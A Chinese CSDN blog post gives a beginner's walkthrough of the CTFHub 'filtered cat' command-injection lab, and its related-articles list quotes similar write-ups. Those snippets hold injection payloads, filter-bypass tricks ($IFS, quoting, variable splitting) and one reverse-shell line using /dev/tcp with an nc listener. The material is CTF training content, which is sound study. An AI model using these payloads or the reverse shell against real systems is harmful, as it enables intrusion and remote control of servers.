CTFHub技能树web(持续更新)--RCE--命令注入--过滤cat

最新推荐文章于 2024-07-17 09:45:19 发布
最新推荐文章于 2024-07-17 09:45:19 发布
阅读量363 收藏 2
点赞数
分类专栏: CTFHub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiuyongpinyin/article/details/113181333
版权

过滤cat

前面还是和上一篇文章一样,首先ping本机地址查看是否有回显,然后查看当前目录的文件:
在这里插入图片描述
看到了有flag字样的php文件,然后我们尝试使用cat,发现不行了:
在这里插入图片描述
在这里有很多种方法,可以使用单引号将cat包裹,还可以使用 sort 来查看:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查看网页源代码:
在这里插入图片描述
得到flag

注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正

拼音怪兽
关注
专栏目录
2018 SCUCTF web题:cat?非常规题解
博客
12-19 1846
主要思路 1.寻找可以写入的目录 2.通过 > 构造文件名,在通过 ls -th>g 将命令写入文件 3.通过bash -i >& /dev/tcp/你的公网ip/监听的端口 0>&1构造反弹shell 4.在服务器使用 "nc -lnvp 相应端口" python脚本如下 # -*- coding: utf8 -*- import requests im...
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7204
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub 命令注入-过滤cat
At0m的博客
01-14 3278
CTFHub 命令注入-过滤cat 第一还是看源码,首先是肯定是过滤cat关键字,虽然看不太懂,但是才也是这样啊嘻嘻。 但是preg_match_all有三个参数,看一下,这三个参数分别是干什么的: <?php $userinfo = "Name: <b>PHP</b> <br> Title: <b>Programming Language</b>"; preg_match_all ("/<b>(.*)<\/b>/
CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入-过滤cat
最新发布
Static______的博客
07-17 207
过滤cat就是找个能代替的。
CTFHub_技能树_Web命令注入——“过滤CAT
Ho1aAs‘s Blog
07-24 990
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 中国蚁剑 解题过程 查看源码,把cat指令过滤了,因此要绕开使用cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $
CTFHub | 过滤cat
尼泊罗河伯的博客
06-18 740
在目标 IP 输入框中输入 IP 并点击 Ping 按钮, Ping 一下试试。页面正常回显。
命令注入————ctfhub过滤cat、空格、目录分隔符、运算符、综合过滤练习)
qq_45655564的博客
05-30 9372
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTFHUB-web-RCE
ookami6497的博客
12-03 1497
CTFHUB-WEB-RCE【08】命令注入
(∪.∪ )...zzz的博客
06-10 230
????命令注入源代码用IP传入IP&ls 查看文件IP&cat 查看内容过滤cat使用`\` `''` `""` `{任意无意义变量名}`等方法均可绕过过滤空格`$IFS` `$IFS$9` 重定向符`<`过滤目录分隔符; && 执行多条命令过滤运算符;综合过滤练习%0a 命令注入 源代码用IP传入 IP&ls 查看文件 1.1.1.1&ls IP&cat 查看内容 1.1.1.1&cat 7096156205265.php 过
CTFHUB-WEB-RCE
K_ShenH的博客
06-16 864
CTFHUB-WEB-RCE
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 1100
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
ctfhub-过滤cat
m0_62094846的博客
12-15 647
和之前那道题差不多,不同的就是cat没用了 法一: 如果让cat不被过滤就可以了 127.0.0.1;a=c;b=at;$a$b flag_1659926138172.php或者127.0.0.1;a=c;b=at;${a}${b} flag_1659926138172.php
CTFHub技能书解题笔记-RCE-过滤cat
qq_43006864的博客
04-01 2862
打开题目,提示我们过滤cat命令,也就是不能用cat来读取flag的值。 这里的话我就去查了linux读取文件的命令cat 从第一行开始显示文本内容(适用于内容较少的) Tac 从最后一行开始显示,是 cat 的逆顺序 More 一页一页的显示文本内容(适用于内容较多的) less 与 more 类似,但是比 more 更好的是,它可以..
ctfhub rce 命令注入 过滤cat 过滤空格 过滤目录分隔符
weixin_52268949的博客
08-20 907
命令注入 源码直接给了出来尝试127.0.0.1;ls 发现一串数字的php文件cat查看 127.0.0.1|cat 233382768628619.php 查看源码发现flag 过滤cat 这题和上一题差不多只不过把cat过滤掉了,过滤cat我们可以用一下几种方法绕过 tac 从最后一行倒序显示内容,并将所有内容输出 more 根据窗口大小,一页一页的现实文件内容 less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符 head 只显示头几行 tail 只显示最后几行 nl 类
CTFHub技能树笔记之RCE命令注入过滤cat过滤空格
weixin_48799157的博客
03-28 8856
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
CTF中遇到cat过滤情况
wikey 的博客
03-28 202
{cat,flag.php} //用逗号实现了空格功能。$IFS$9 //$9改成 $ 加其他数字貌似都行。php中的cat函数可以提供查询功能,本机的IP是127.0.0.1。以下都可以作为空格过滤
CTFhub(eval执行,无过滤过滤cat过滤空格,过滤运算符)
ndjnddjxn的博客
04-02 845
未发现什么,返回上一级目录?
CTFWEB题——RCE
tomyyyyy
10-31 6418
CTFWEB题——RCE 目录CTFWEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2373
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值